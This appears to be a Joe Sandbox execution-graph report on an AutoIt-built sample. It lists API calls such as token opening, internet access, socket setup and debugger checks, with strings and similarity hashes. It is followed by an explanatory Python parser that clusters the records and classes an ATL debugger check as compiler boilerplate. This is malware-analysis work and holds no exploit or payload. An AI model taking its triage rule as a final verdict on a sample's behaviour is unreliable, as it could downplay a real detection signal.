                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 00109339
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00108F04), ref: 00109340
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00108F04), ref: 0010934D
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00108F04), ref: 00109354
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 000F0679
                                          • GetDC.USER32(00000000), ref: 000F0683
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000F06A3
                                          • ReleaseDC.USER32(?), ref: 000F06C4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 000F068D
                                          • GetDC.USER32(00000000), ref: 000F0697
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000F06A3
                                          • ReleaseDC.USER32(?), ref: 000F06C4
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          APIs
                                            • Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • __wcsnicmp.LIBCMT ref: 0011B670
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0011B739
                                          Strings
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 000BE01E
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 000BE037
                                          Strings
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          APIs
                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00138186
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0013819B
                                          Strings
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '
                                          • API String ID: 3850602802-1997036262
                                          APIs
                                          • _memset.LIBCMT ref: 00122C6A
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00122CA0
                                          Strings
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 0013713C
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00137178
                                          Strings
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          APIs
                                          • _memset.LIBCMT ref: 001130B8
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001130F3
                                          Strings
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          APIs
                                          • __snwprintf.LIBCMT ref: 00124132
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          Strings
                                          Similarity
                                          • API ID: __snwprintf_memmove
                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                          • API String ID: 3506404897-2584243854
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00136D86
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00136D91
                                          Strings
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          APIs
                                            • Part of subcall function 000B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
                                            • Part of subcall function 000B2111: GetStockObject.GDI32(00000011), ref: 000B2163
                                            • Part of subcall function 000B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D
                                          • GetWindowRect.USER32(00000000,?), ref: 00137296
                                          • GetSysColor.USER32(00000012), ref: 001372B0
                                          Strings
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 00136FC7
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00136FD6
                                          Strings
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          APIs
                                          • _memset.LIBCMT ref: 001131C9
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001131E8
                                          Strings
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001228F8
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00122921
                                          Strings
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          APIs
                                            • Part of subcall function 001286E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0012849D,?,00000000,?,?), ref: 001286F7
                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001284A0
                                          • htons.WSOCK32(00000000,?,00000000), ref: 001284DD
                                          Strings
                                          Similarity
                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 2496851823-2422070025
                                          • Opcode ID: e107fd0de4b084340d9248e08663a6272a01b0e4717571ab77d8dd40b31c934b
                                          • Instruction ID: b6758620d8d31e25dfb8ccc3fbca37259127337112f668756d37b621632ff802
                                          • Opcode Fuzzy Hash: e107fd0de4b084340d9248e08663a6272a01b0e4717571ab77d8dd40b31c934b
                                          • Instruction Fuzzy Hash: AE11C47560422AABDB10EF64DC86FEEB364FF15320F10861AFA15972D2DB71A820C795
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00109A2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: cd3a14f4616c80367b8646a0b7914b691237f91c1d371562f9b9b2c3f100074b
                                          • Instruction ID: 7f0676736a8d886c4c92d5508654dcfcd12a9e37004a41c73f3e3dcb692a39b4
                                          • Opcode Fuzzy Hash: cd3a14f4616c80367b8646a0b7914b691237f91c1d371562f9b9b2c3f100074b
                                          • Instruction Fuzzy Hash: 05012871A46124ABCB14EBA4CCA2DFE7369EF56320B400609F8B2532D3DF7058088650
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: f8b2ed6e158b7e784317a3151a4f2b2bf9d85d15e48ea635a6f27a972d900189
                                          • Instruction ID: 70a7c6413d52ef87dd84b883d94995fbf05d0ac6d81005a972ea956d615f5037
                                          • Opcode Fuzzy Hash: f8b2ed6e158b7e784317a3151a4f2b2bf9d85d15e48ea635a6f27a972d900189
                                          • Instruction Fuzzy Hash: A701B9729042587EDB18C6A8CC56EFEBBF89B15301F00429FF552D62C2E9B5A6189760
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00109923
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: c123157c147da27247da2eabd4c2f11b7996ed93c64c0e17a239f66dc4780445
                                          • Instruction ID: e5301c219955bfc51562f7774c7d0681324bb643822cfba18e7f5f9cb90772cb
                                          • Opcode Fuzzy Hash: c123157c147da27247da2eabd4c2f11b7996ed93c64c0e17a239f66dc4780445
                                          • Instruction Fuzzy Hash: 1B01A7B6A421086BCB14EBA0C962EFF77A89F16340F50011DB892632D3DB509E1896B1
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 001099A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 619f21fc8d185633998102381df079fcd2ffc4da2a750def61e6d7e7f87a5e54
                                          • Instruction ID: 7ef6a14d519b0d724d2e3b28ed939ca59cf0596753f6a667b98bf0662cb78bf0
                                          • Opcode Fuzzy Hash: 619f21fc8d185633998102381df079fcd2ffc4da2a750def61e6d7e7f87a5e54
                                          • Instruction Fuzzy Hash: BB01DBB2A4610467CB14EBA4CA52FFF77AC9F12340F500019B896B32D3DB659F189672
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 9668fb3eec0610a8cff9e49ba96de7febd86d6ac16ef98c5d8cf26d3248b9f3e
                                          • Instruction ID: 2b4357272bcd292660261a025dc35a00413f2abedfca76ebc8ca6cdc3c8769b4
                                          • Opcode Fuzzy Hash: 9668fb3eec0610a8cff9e49ba96de7febd86d6ac16ef98c5d8cf26d3248b9f3e
                                          • Instruction Fuzzy Hash: ECE0617650432867D3209659AC49FD7F7ECDB45771F000027FD04D3051E670A98087E1
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001088A0
                                            • Part of subcall function 000D3588: _doexit.LIBCMT ref: 000D3592
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: 5712525d9ce265d18445fadfe85b2e918e628474271e98e2915a5a12141261ca
                                          • Instruction ID: f5dc441bffac166e813465e6d57b8d11e6a5bf870eca34838681dbf0f448dece
                                          • Opcode Fuzzy Hash: 5712525d9ce265d18445fadfe85b2e918e628474271e98e2915a5a12141261ca
                                          • Instruction Fuzzy Hash: C2D05B3138536832D21536A47C1BFCA7A488F05B51F44442BFB48655D34EE595D041E6
                                          APIs
                                            • Part of subcall function 000EB544: _memset.LIBCMT ref: 000EB551
                                            • Part of subcall function 000D0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000EB520,?,?,?,000B100A), ref: 000D0B79
                                          • IsDebuggerPresent.KERNEL32(?,?,?,000B100A), ref: 000EB524
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000B100A), ref: 000EB533
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000EB52E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: eec97539231a01aae001dba7b3e85ecfdc2268d3df2a8aaa879205b105625869
                                          • Instruction ID: ddc04a78f223ce721efadce87d4e04a198694fccfffd8562bb4c0297f667dff0
                                          • Opcode Fuzzy Hash: eec97539231a01aae001dba7b3e85ecfdc2268d3df2a8aaa879205b105625869
                                          • Instruction Fuzzy Hash: 38E06D74200B518FD321AF66E404B437AF0AF04745F00891EE866D7B51EBB5D588CBA1
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?), ref: 000F0091
                                            • Part of subcall function 0012C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,000F027A,?), ref: 0012C6E7
                                            • Part of subcall function 0012C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0012C6F9
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 000F0289
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                          • String ID: WIN_XPe
                                          • API String ID: 582185067-3257408948
                                          • Opcode ID: a15148a7dfb58afaca076488640c516c8ab8fd77afede5a54cc5951afa3b2b46
                                          • Instruction ID: 251bbaa7e0400e92cad00cab4ba16f2125628fd2d58c7823e48ab7c601a3dac5
                                          • Opcode Fuzzy Hash: a15148a7dfb58afaca076488640c516c8ab8fd77afede5a54cc5951afa3b2b46
                                          • Instruction Fuzzy Hash: 31F0C071805109DFCB65DB61C958BFC7BF8AB48340F140085E246A25A2CB754F84EF21
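The records above all share one shape (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and the Similarity block's API String ID keys on the API set and the string set only: the three SendMessageW functions at 00109A2B, 00109923 and 001099A6 all carry 372448540-1403004172 while their Opcode IDs differ. The parser below is an added example, not part of the Joe Sandbox report or its tooling. It reads this text layout, buckets records by API String ID, decodes the message constants passed to SendMessageW (0x180, 0x182 and 0x1A2 are LB_ADDSTRING, LB_DELETESTRING and LB_FINDSTRINGEXACT in winuser.h, which matches the ComboBox$ListBox string pair), and separates the IsDebuggerPresent/OutputDebugStringW record from sample-specific anti-debugging: that pair, guarded by the string "ERROR : Unable to initialize critical section in CAtlBaseModule", is the ATL CAtlBaseModule constructor that every MSVC/ATL-linked binary carries. The sample records are copied from this page and trimmed; the message table, the `triage` rule and all function names are the example's own.

```python
"""Parse Joe Sandbox 'Execution Graph' function records from a text export and
cluster them by API String ID.  Added example: the record layout is taken from
the report above; the message table and the ATL triage rule are this example's."""
import re
from collections import defaultdict

# Constructed sample: three records copied from the report above, trimmed to
# the fields this parser reads (Memory Dump Source and hash lines omitted).
SAMPLE = """\
APIs
  • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00109A2B
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: cd3a14f4616c80367b8646a0b7914b691237f91c1d371562f9b9b2c3f100074b
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00109923
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: c123157c147da27247da2eabd4c2f11b7996ed93c64c0e17a239f66dc4780445
APIs
  • Part of subcall function 000D0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000EB520,?,?,?,000B100A), ref: 000D0B79
• IsDebuggerPresent.KERNEL32(?,?,?,000B100A), ref: 000EB524
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000B100A), ref: 000EB533
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000EB52E
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: eec97539231a01aae001dba7b3e85ecfdc2268d3df2a8aaa879205b105625869
"""

HEADERS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# One API line: optional "Part of subcall function X: ", then Name.MODULE(args), ref: addr
API_CALL = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
LB_MESSAGES = {0x180: "LB_ADDSTRING", 0x182: "LB_DELETESTRING", 0x1A2: "LB_FINDSTRINGEXACT"}
# Text the ATL CAtlBaseModule constructor emits when its critical section fails to
# initialise; the IsDebuggerPresent/OutputDebugStringW pair around it is runtime code.
ATL_MARKER = "Unable to initialize critical section in CAtlBaseModule"


def parse_records(text):
    """Split the export into records; a record starts at each 'APIs' header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None:          # leading fragment of a record cut off above
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_CALL.match(body)
            if m:
                rec["apis"].append(m.groupdict())
        elif section == "Strings":
            rec["strings"].append(body)
        elif section == "Similarity":
            key, _, value = body.partition(": ")
            rec["similarity"][key] = value
    return records


def cluster_by_api_string_id(records):
    """API String ID keys on API set + string set only, so functions with
    different code (different Opcode IDs) land in the same bucket."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec["similarity"].get("API String ID")].append(rec)
    return groups


def decode_sendmessage(call):
    """SendMessageW's second argument is the message ID (hex in the report)."""
    args = (call["args"] or "").split(",")
    if call["name"] != "SendMessageW" or len(args) < 2 or not re.fullmatch(r"[0-9A-F]+", args[1]):
        return None
    msg = int(args[1], 16)
    return LB_MESSAGES.get(msg, f"0x{msg:04X}")


def triage(rec):
    """Label a record as ATL runtime boilerplate or as needing analyst review."""
    names = {c["name"] for c in rec["apis"]}
    atl = any(ATL_MARKER in (c["args"] or "") for c in rec["apis"])
    if {"IsDebuggerPresent", "OutputDebugStringW"} <= names and atl:
        return "atl-runtime-boilerplate"
    return "review"
```

Run `parse_records` over the saved text of the whole report and look first at buckets holding more than one Opcode ID: those are functions the API/string key cannot tell apart, so the API arguments and the Strings block, not the fuzzy hash, are what distinguish them. A record labelled `atl-runtime-boilerplate` is the compiler's code, and should not by itself count toward the "checks if a debugger is running" signature.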